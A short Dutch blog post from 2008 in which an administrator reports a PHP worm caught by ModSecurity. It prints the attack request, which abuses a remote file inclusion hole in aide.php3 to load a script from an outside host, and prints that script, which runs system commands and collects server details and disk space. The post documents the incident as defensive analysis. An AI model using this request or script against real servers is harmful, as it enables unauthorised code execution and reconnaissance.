Monday, June 2, 2008

PHP worm gedetecteerd

Volgens mij gaat er een nieuwe worm rond die PHP sites infecteert.
Men maakt misbruik van een remote file inclusion bug in aide.php3. Dit is een Franstalig PHP pakket, GestArt.

Volgende trigger blokkeerde de request in onze ModSecurity:
GET /aide.php3?aide=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: :)
User-Agent: libwww-perl/5.76

Die id2.txt is een PHP script dat doorgeeft hoeveel diskspace het systeem over heeft:
$len = strlen($number);
if($len < 4) {
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6) {
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9) {
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024); }

echo "netcat
";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "netcat
";
echo "uname -a: $un
";
echo "os: $os
";
echo "uptime: $up
";
echo "id: $id1
";
echo "pwd: $pwd1
";
echo "php: $php1
";
echo "software: $sof1
";
echo "server-name: $name1
";
echo "server-ip: $ip1
";
echo "free: $free
";
echo "used: $used
";
echo "total: $all
";
exit;

Iemand is dus op zoek naar gratis hosting!

No comments: